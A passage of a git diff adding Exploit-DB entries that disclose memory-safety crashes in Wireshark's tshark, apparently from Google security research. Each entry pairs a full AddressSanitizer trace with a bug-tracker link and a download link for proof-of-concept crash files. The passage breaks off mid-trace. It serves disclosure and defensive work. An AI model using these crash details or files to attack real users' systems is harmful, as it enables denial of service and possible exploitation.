00 00 00 00 00 00 00 00 00 + 0x0c247fff9670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c247fff9680:[fa]fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c247fff9690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c247fff96a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c247fff96b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c247fff96c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c247fff96d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==28048==ABORTING +--- cut --- + +The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554129. Attached are two PDF files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39322.zip + diff --git a/platforms/multiple/dos/39323.txt b/platforms/multiple/dos/39323.txt new file mode 100755 index 000000000..61f444a9b --- /dev/null +++ b/platforms/multiple/dos/39323.txt @@ -0,0 +1,65 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=697 + +The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==25088==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffdbb9f36e at pc 0x7f26c4ae2af4 bp 0x7fffdbb9f190 sp 0x7fffdbb9f188 +READ of size 1 at 0x7fffdbb9f36e thread T0 + #0 0x7f26c4ae2af3 in ascii_strup_inplace wireshark/wsutil/str_util.c:71:16 + #1 0x7f26d8893b1c in iseries_check_file_type wireshark/wiretap/iseries.c:336:9 + #2 0x7f26d8892a63 in iseries_open wireshark/wiretap/iseries.c:231:14 + #3 0x7f26d8864c51 in wtap_open_offline wireshark/wiretap/file_access.c:1042:13 + #4 0x51dd9d in cf_open wireshark/tshark.c:4195:9 + #5 0x5178cb in main wireshark/tshark.c:2188:9 + +Address 0x7fffdbb9f36e is located in stack of thread T0 at offset 302 in frame + #0 0x7f26d88934bf in iseries_check_file_type wireshark/wiretap/iseries.c:306 + + This frame has 2 object(s): + [32, 302) 'buf' <== Memory access at offset 302 overflows this variable + [368, 377) 'protocol' +HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext + (longjmp and C++ exceptions *are* supported) +SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wsutil/str_util.c:71:16 in ascii_strup_inplace +Shadow bytes around the buggy address: + 0x10007b76be10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10007b76be20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10007b76be30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10007b76be40: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00 + 0x10007b76be50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x10007b76be60: 00 00 00 00 00 00 00 00 00 00 00 00 00[06]f2 f2 + 0x10007b76be70: f2 f2 f2 f2 f2 f2 00 01 f3 f3 f3 f3 00 00 00 00 + 0x10007b76be80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10007b76be90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10007b76bea0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 + 0x10007b76beb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==25088==ABORTING +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11985. Attached is a file which triggers the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39323.zip + diff --git a/platforms/multiple/dos/39324.txt b/platforms/multiple/dos/39324.txt new file mode 100755 index 000000000..0bdbb88bc --- /dev/null +++ b/platforms/multiple/dos/39324.txt @@ -0,0 +1,113 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=696 + +The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==24710==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe68161a6c at pc 0x0000004ab766 bp 0x7ffe681503f0 sp 0x7ffe6814fba0 +WRITE of size 120 at 0x7ffe68161a6c thread T0 + #0 0x4ab765 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 + #1 0x7ff89a5f89ec in tvb_memcpy wireshark/epan/tvbuff.c:783:10 + #2 0x7ff89b7ba95c in dissect_nhdr_extopt wireshark/epan/dissectors/packet-lbmc.c:10013:13 + #3 0x7ff89b7a1a54 in lbmc_dissect_lbmc_packet wireshark/epan/dissectors/packet-lbmc.c:11039:41 + #4 0x7ff89b82ece9 in dissect_lbttcp_pdu wireshark/epan/dissectors/packet-lbttcp.c:620:21 + #5 0x7ff89c4a5254 in tcp_dissect_pdus wireshark/epan/dissectors/packet-tcp.c:2762:13 + #6 0x7ff89b82c7dc in dissect_lbttcp_real wireshark/epan/dissectors/packet-lbttcp.c:642:5 + #7 0x7ff89b82ad4e in test_lbttcp_packet wireshark/epan/dissectors/packet-lbttcp.c:698:5 + #8 0x7ff89a4b1c57 in dissector_try_heuristic wireshark/epan/packet.c:2332:7 + #9 0x7ff89c4a6de0 in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4644:13 + #10 0x7ff89c4ac5e3 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4690:13 + #11 0x7ff89c4a765b in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4771:9 + #12 0x7ff89c4bc7f0 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5623:13 + #13 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #14 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #15 0x7ff89a4a95fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9 + #16 0x7ff89b5f0e0b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1976:7 + #17 0x7ff89b5fba21 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2468:10 + #18 0x7ff89b5f1569 in dissect_ip wireshark/epan/dissectors/packet-ip.c:2491:5 + #19 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #20 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #21 0x7ff89a4a95fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9 + #22 0x7ff89a4aa1a4 in dissector_try_uint wireshark/epan/packet.c:1177:9 + #23 0x7ff89bdd7830 in dissect_ppp_common wireshark/epan/dissectors/packet-ppp.c:4346:10 + #24 0x7ff89bdd6fec in dissect_ppp_hdlc_common wireshark/epan/dissectors/packet-ppp.c:5339:5 + #25 0x7ff89bdcf2a5 in dissect_ppp_hdlc wireshark/epan/dissectors/packet-ppp.c:5380:5 + #26 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #27 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #28 0x7ff89a4a95fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9 + #29 0x7ff89b1e60d3 in dissect_frame wireshark/epan/dissectors/packet-frame.c:491:11 + #30 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #31 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #32 0x7ff89a4b396e in call_dissector_only wireshark/epan/packet.c:2665:8 + #33 0x7ff89a4a53df in call_dissector_with_data wireshark/epan/packet.c:2678:8 + #34 0x7ff89a4a4a2b in dissect_record wireshark/epan/packet.c:502:3 + #35 0x7ff89a4559b9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2 + #36 0x52856b in process_packet wireshark/tshark.c:3728:5 + #37 0x5219e0 in load_cap_file wireshark/tshark.c:3484:11 + #38 0x517e2c in main wireshark/tshark.c:2197:13 + +Address 0x7ffe68161a6c is located in stack of thread T0 at offset 65644 in frame + #0 0x7ff89b79d1ff in lbmc_dissect_lbmc_packet wireshark/epan/dissectors/packet-lbmc.c:10597 + + This frame has 17 object(s): + [32, 36) 'bhdr' + [48, 52) 'msgprop_len' + [64, 80) 'frag_info' + [96, 65644) 'reassembly' <== Memory access at offset 65644 overflows this variable + [65904, 65908) 'data_is_umq_cmd_resp' + [65920, 65940) 'stream_info' + [65984, 65996) 'ctxinstd_info' + [66016, 66028) 'ctxinstr_info' + [66048, 66120) 'destination_info' + [66160, 66416) 'found_header' + [66480, 66584) 'uim_stream_info' + [66624, 66632) 'tcp_sid_info' + [66656, 66672) 'tcp_addr' + [66688, 66692) 'tcp_session_id' + [66704, 66712) 'hdtbl_entry' + [66736, 66740) 'encoding' + [66752, 66756) 'pdmlen' +HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext + (longjmp and C++ exceptions *are* supported) +SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy +Shadow bytes around the buggy address: + 0x10004d0242f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004d024300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004d024310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004d024320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004d024330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x10004d024340: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]f2 f2 + 0x10004d024350: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 + 0x10004d024360: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 04 f2 + 0x10004d024370: 00 00 04 f2 f2 f2 f2 f2 00 04 f2 f2 00 04 f2 f2 + 0x10004d024380: 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 00 00 + 0x10004d024390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==24710==ABORTING +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11984. Attached are two files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39324.zip + diff --git a/platforms/multiple/dos/39325.txt b/platforms/multiple/dos/39325.txt new file mode 100755 index 000000000..d877a5e62 --- /dev/null +++ b/platforms/multiple/dos/39325.txt @@ -0,0 +1,89 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=695 + +The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==24377==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f7a3ce4efe0 at pc 0x7f7a39a5a121 bp 0x7ffe1fcb92e0 sp 0x7ffe1fcb92d8 +READ of size 4 at 0x7f7a3ce4efe0 thread T0 + #0 0x7f7a39a5a120 in hiqnet_display_data wireshark/epan/dissectors/packet-hiqnet.c:523:15 + #1 0x7f7a39a59354 in dissect_hiqnet_pdu wireshark/epan/dissectors/packet-hiqnet.c:906:34 + #2 0x7f7a39a560b7 in dissect_hiqnet_udp wireshark/epan/dissectors/packet-hiqnet.c:1031:9 + #3 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #4 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #5 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9 + #6 0x7f7a38aa41a4 in dissector_try_uint wireshark/epan/packet.c:1177:9 + #7 0x7f7a3abc065d in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:536:7 + #8 0x7f7a3abce912 in dissect wireshark/epan/dissectors/packet-udp.c:1031:5 + #9 0x7f7a3abc31a0 in dissect_udplite wireshark/epan/dissectors/packet-udp.c:1044:3 + #10 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #11 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #12 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9 + #13 0x7f7a39beae0b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1976:7 + #14 0x7f7a39bf5a21 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2468:10 + #15 0x7f7a39beb569 in dissect_ip wireshark/epan/dissectors/packet-ip.c:2491:5 + #16 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #17 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #18 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9 + #19 0x7f7a38aa41a4 in dissector_try_uint wireshark/epan/packet.c:1177:9 + #20 0x7f7a3a3d1830 in dissect_ppp_common wireshark/epan/dissectors/packet-ppp.c:4346:10 + #21 0x7f7a3a3d0fec in dissect_ppp_hdlc_common wireshark/epan/dissectors/packet-ppp.c:5339:5 + #22 0x7f7a3a3c92a5 in dissect_ppp_hdlc wireshark/epan/dissectors/packet-ppp.c:5380:5 + #23 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #24 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #25 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9 + #26 0x7f7a397e00d3 in dissect_frame wireshark/epan/dissectors/packet-frame.c:491:11 + #27 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #28 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #29 0x7f7a38aad96e in call_dissector_only wireshark/epan/packet.c:2665:8 + #30 0x7f7a38a9f3df in call_dissector_with_data wireshark/epan/packet.c:2678:8 + #31 0x7f7a38a9ea2b in dissect_record wireshark/epan/packet.c:502:3 + #32 0x7f7a38a4f9b9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2 + #33 0x52856b in process_packet wireshark/tshark.c:3728:5 + #34 0x5219e0 in load_cap_file wireshark/tshark.c:3484:11 + #35 0x517e2c in main wireshark/tshark.c:2197:13 + +0x7f7a3ce4efe0 is located 32 bytes to the left of global variable '' defined in 'packet-hiqnet.c' (0x7f7a3ce4f000) of size 16 + '' is ascii string 'packet-hiqnet.c' +0x7f7a3ce4efe0 is located 16 bytes to the right of global variable 'hiqnet_datasize_per_type' defined in 'packet-hiqnet.c:282:19' (0x7f7a3ce4efa0) of size 48 +SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-hiqnet.c:523:15 in hiqnet_display_data +Shadow bytes around the buggy address: + 0x0fefc79c1da0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 + 0x0fefc79c1db0: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 05 f9 f9 + 0x0fefc79c1dc0: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 00 f9 f9 + 0x0fefc79c1dd0: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 + 0x0fefc79c1de0: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 04 f9 f9 +=>0x0fefc79c1df0: f9 f9 f9 f9 00 00 00 00 00 00 f9 f9[f9]f9 f9 f9 + 0x0fefc79c1e00: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 + 0x0fefc79c1e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0fefc79c1e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0fefc79c1e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0fefc79c1e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11983. Attached are three files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39325.zip + diff --git a/platforms/multiple/dos/39326.txt b/platforms/multiple/dos/39326.txt new file mode 100755 index 000000000..83e583d60 --- /dev/null +++ b/platforms/multiple/dos/39326.txt @@ -0,0 +1,64 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=694 + +The following crash due to a stack-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==23220==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffc04c9c20 at pc 0x00000046cc29 bp 0x7fffc04c99b0 sp 0x7fffc04c9160 +READ of size 515 at 0x7fffc04c9c20 thread T0 + #0 0x46cc28 in StrstrCheck(void*, char*, char const*, char const*) llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:314 + #1 0x46d0f7 in __interceptor_strstr llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:328 + #2 0x7fbfa4361585 in nettrace_3gpp_32_423_file_open wireshark/wiretap/nettrace_3gpp_32_423.c:986:13 + #3 0x7fbfa429fc7c in wtap_open_offline wireshark/wiretap/file_access.c:913:11 + #4 0x51dd9d in cf_open wireshark/tshark.c:4195:9 + #5 0x5178cb in main wireshark/tshark.c:2188:9 + +Address 0x7fffc04c9c20 is located in stack of thread T0 at offset 544 in frame + #0 0x7fbfa43611ff in nettrace_3gpp_32_423_file_open wireshark/wiretap/nettrace_3gpp_32_423.c:964 + + This frame has 1 object(s): + [32, 544) 'magic_buf' <== Memory access at offset 544 overflows this variable +HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext + (longjmp and C++ exceptions *are* supported) +SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:314 in StrstrCheck(void*, char*, char const*, char const*) +Shadow bytes around the buggy address: + 0x100078091330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x100078091340: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 + 0x100078091350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x100078091360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x100078091370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x100078091380: 00 00 00 00[f3]f3 f3 f3 f3 f3 f3 f3 00 00 00 00 + 0x100078091390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000780913a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000780913b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000780913c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000780913d0: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==23220==ABORTING +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11982. Attached are three files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39326.zip + diff --git a/platforms/multiple/dos/39327.txt b/platforms/multiple/dos/39327.txt new file mode 100755 index 000000000..b43f13f51 --- /dev/null +++ b/platforms/multiple/dos/39327.txt @@ -0,0 +1,133 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=659 + +The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==6953==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fdbb5647800 at pc 0x7fdd101b5365 bp 0x7ffee2b92610 sp 0x7ffee2b92608 +READ of size 1 at 0x7fdbb5647800 thread T0 + #0 0x7fdd101b5364 in dissect_ber_constrained_bitstring wireshark/epan/dissectors/packet-ber.c:3990:17 + #1 0x7fdd101b5a56 in dissect_ber_bitstring wireshark/epan/dissectors/packet-ber.c:4016:10 + #2 0x7fdd1277c345 in dissect_ns_cert_exts_CertType wireshark/epan/dissectors/../../asn1/ns_cert_exts/packet-ns_cert_exts-fn.c:93:12 + #3 0x7fdd1277b3fe in dissect_CertType_PDU wireshark/epan/dissectors/../../asn1/ns_cert_exts/packet-ns_cert_exts-fn.c:155:12 + #4 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #5 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #6 0x7fdd0fcba02d in dissector_try_string wireshark/epan/packet.c:1443:9 + #7 0x7fdd1019276b in call_ber_oid_callback wireshark/epan/dissectors/packet-ber.c:1096:17 + #8 0x7fdd12bd0192 in dissect_x509af_T_extnValue wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:138:10 + #9 0x7fdd101a1d4a in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17 + #10 0x7fdd12bcd47d in dissect_x509af_Extension wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:155:12 + #11 0x7fdd101ae695 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9 + #12 0x7fdd101aea3b in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12 + #13 0x7fdd12bcd52d in dissect_x509af_Extensions wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:168:12 + #14 0x7fdd101a1d4a in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17 + #15 0x7fdd12bd02af in dissect_x509af_T_signedCertificate wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:191:12 + #16 0x7fdd101a1d4a in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17 + #17 0x7fdd12bcd5dd in dissect_x509af_Certificate wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:218:12 + #18 0x7fdd11c08b83 in ssl_dissect_hnd_cert wireshark/epan/dissectors/packet-ssl-utils.c:5958:21 + #19 0x7fdd11c21752 in dissect_ssl3_handshake wireshark/epan/dissectors/packet-ssl.c:1930:17 + #20 0x7fdd11c1a71b in dissect_ssl3_record wireshark/epan/dissectors/packet-ssl.c:1619:13 + #21 0x7fdd11c14e12 in dissect_ssl wireshark/epan/dissectors/packet-ssl.c:723:26 + #22 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #23 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #24 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #25 0x7fdd11c697d0 in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4610:9 + #26 0x7fdd11c6f043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13 + #27 0x7fdd11c6bbed in desegment_tcp wireshark/epan/dissectors/packet-tcp.c:2260:9 + #28 0x7fdd11c6a24e in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4735:9 + #29 0x7fdd11c7f7a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13 + #30 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #31 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #32 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #33 0x7fdd10dc588b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7 + #34 0x7fdd10dd02b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10 + #35 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #36 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #37 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #38 0x7fdd0fcb8964 in dissector_try_uint wireshark/epan/packet.c:1174:9 + #39 0x7fdd108d748d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21 + #40 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #41 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #42 0x7fdd0fcc22be in call_dissector_only wireshark/epan/packet.c:2662:8 + #43 0x7fdd0fcb3ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #44 0x7fdd108d3725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5 + #45 0x7fdd108cbf33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5 + #46 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #47 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #48 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #49 0x7fdd109c75f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11 + #50 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #51 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #52 0x7fdd0fcc22be in call_dissector_only wireshark/epan/packet.c:2662:8 + #53 0x7fdd0fcb3ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8 + #54 0x7fdd0fcb333b in dissect_record wireshark/epan/packet.c:501:3 + #55 0x7fdd0fc613c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2 + #56 0x5264eb in process_packet wireshark/tshark.c:3728:5 + #57 0x51f960 in load_cap_file wireshark/tshark.c:3484:11 + #58 0x515daf in main wireshark/tshark.c:2197:13 + +0x7fdbb5647800 is located 0 bytes to the right of 2097152-byte region [0x7fdbb5447800,0x7fdbb5647800) +allocated by thread T0 here: + #0 0x4c0bc8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x7fdd081e9610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610) + #2 0x7fdd131b731d in wmem_block_fast_alloc wireshark/epan/wmem/wmem_allocator_block_fast.c:126:9 + #3 0x7fdd0fc0f4ca in address_to_str wireshark/epan/address_types.c:909:18 + #4 0x7fdd0fc109b0 in address_with_resolution_to_str wireshark/epan/address_types.c:1054:16 + #5 0x7fdd108d16c5 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:494:17 + #6 0x7fdd108cbf33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5 + #7 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #8 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #9 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #10 